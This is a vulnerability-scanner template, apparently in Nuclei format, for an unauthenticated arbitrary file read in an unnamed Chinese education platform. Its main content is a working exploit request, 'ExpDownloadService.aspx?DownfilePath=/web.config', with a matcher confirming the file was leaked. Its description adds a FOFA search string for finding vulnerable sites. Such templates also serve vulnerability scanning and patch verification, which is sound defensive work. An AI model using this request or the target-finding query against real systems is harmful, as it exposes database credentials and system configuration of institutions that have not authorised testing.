http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /ExpDownloadService.aspx?DownfilePath=/web.config HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: EDU-zhihuipingtai-ExpDownloadService_aspx-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="custom/blue/uimaker/easyui.css"
        EDU 某智慧平台 ExpDownloadService.aspx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: EDU 某智慧平台 ExpDownloadService.aspx 任意文件读取
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487811&idx=1&sn=36e8bc1f6eb545d1d3ae59c352721104&chksm=c267a470f5102d66e9df28edaa931e745d3b7064ac6bfa0c4d5540978a4475786e05ff06059c&token=65579130&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - uIP
